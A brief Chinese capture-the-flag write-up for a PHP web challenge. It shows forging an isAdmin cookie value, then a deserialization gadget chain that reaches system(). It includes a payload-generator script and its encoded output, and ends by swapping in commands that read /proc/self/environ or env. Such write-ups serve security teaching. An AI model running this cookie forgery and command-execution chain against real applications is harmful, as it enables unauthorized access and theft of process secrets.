打开是空页面

抓包发现cookies有东西

O:4:"User":1:{s:7:"isAdmin";b:0;}

将零改为1，放包得到题目页面

 <?php
error_reporting(0);
include('utils.php');class A {public $className;public $funcName;public $args;public function __destruct() {$class = new $this->className;$funcName = $this->funcName;$class->$funcName($this->args);}
}class B {public function __call($func, $arg) {$func($arg[0]);}
}if(checkUser()) {highlight_file(__FILE__);$payload = strrev(base64_decode($_POST['payload']));unserialize($payload);
}

编写payload

<?php
class A {public $className;public $funcName;public $args;
}class B {public function __call($func, $arg) {$func($arg[0]);}
}$a = new A();
$a->className = 'B';
$a->funcName = 'system';
$a->args = 'ls';echo $payload = urlencode(base64_encode(strrev(serialize($a))));
?>结果
fTsic2wiOjI6czsic2dyYSI6NDpzOyJtZXRzeXMiOjY6czsiZW1hTmNudWYiOjg6czsiQiI6MTpzOyJlbWFOc3NhbGMiOjk6c3s6MzoiQSI6MTpP

__call方法

strrev方法

反转字符

ls改成cat /proc/self/environ或者env即可